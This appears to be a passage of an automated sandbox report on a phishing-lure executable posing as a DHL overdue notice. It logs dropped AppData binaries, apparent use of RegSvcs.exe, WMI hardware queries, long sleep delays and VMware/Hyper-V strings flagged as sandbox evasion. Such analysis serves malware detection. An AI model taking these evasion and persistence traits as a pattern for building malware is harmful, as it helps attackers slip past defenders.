                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Source: Yara matchFile source: Process Memory Space: DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe PID: 6532, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: LJAGvecDW.exe PID: 2744, type: MEMORYSTR
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeMemory allocated: 1070000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeMemory allocated: 2A70000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeMemory allocated: 2990000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeMemory allocated: 9060000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeMemory allocated: 7A00000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeMemory allocated: A060000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeMemory allocated: B060000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeMemory allocated: B590000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeMemory allocated: 9060000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeMemory allocated: AF0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeMemory allocated: 2720000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeMemory allocated: C10000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeMemory allocated: 8680000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeMemory allocated: 6EC0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeMemory allocated: 9680000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeMemory allocated: A680000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeMemory allocated: AB90000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeMemory allocated: 8680000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeMemory allocated: 17B0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeMemory allocated: 3320000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeMemory allocated: 1830000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeMemory allocated: 1540000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeMemory allocated: 3390000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeMemory allocated: 30E0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeCode function: 1_2_078FF508 sgdt fword ptr [edi]1_2_078FF508
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2780Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4487Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 517Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2128Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 894Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 766
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 3019
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5676Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1080Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4616Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 420Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe TID: 2144Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe TID: 2184Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99750Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99574Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99458Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99250Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99140Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99031Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98921Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98811Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98689Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98563Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98438Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98313Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98203Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98094Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97969Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97859Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97749Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 100000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99859
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99749
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99640
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99531
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99421
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99312
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99202
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99093
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98984
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98875
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98766
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98656
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98547
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98437
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98328
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98218
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98106
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 922337203685477
                      Source: Amcache.hve.12.drBinary or memory string: VMware
                      Source: Amcache.hve.12.drBinary or memory string: VMware Virtual USB Mouse
                      Source: Amcache.hve.12.drBinary or memory string: vmci.syshbin
                      Source: Amcache.hve.12.drBinary or memory string: VMware, Inc.
                      Source: Amcache.hve.12.drBinary or memory string: VMware20,1hbin@
                      Source: Amcache.hve.12.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                      Source: Amcache.hve.12.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: Amcache.hve.12.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                      Source: Amcache.hve.12.drBinary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
                      Source: Amcache.hve.12.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: Amcache.hve.12.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                      Source: Amcache.hve.12.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                      Source: Amcache.hve.12.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: RegSvcs.exe, 00000009.00000002.2413533818.0000000001448000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000014.00000002.3506077772.0000000006260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: Amcache.hve.12.drBinary or memory string: vmci.sys
                      Source: Amcache.hve.12.drBinary or memory string: vmci.syshbin`
                      Source: Amcache.hve.12.drBinary or memory string: \driver\vmci,\driver\pci
                      Source: Amcache.hve.12.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: Amcache.hve.12.drBinary or memory string: VMware20,1
                      Source: LJAGvecDW.exe, 0000000D.00000002.2452107240.0000000006C24000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}=
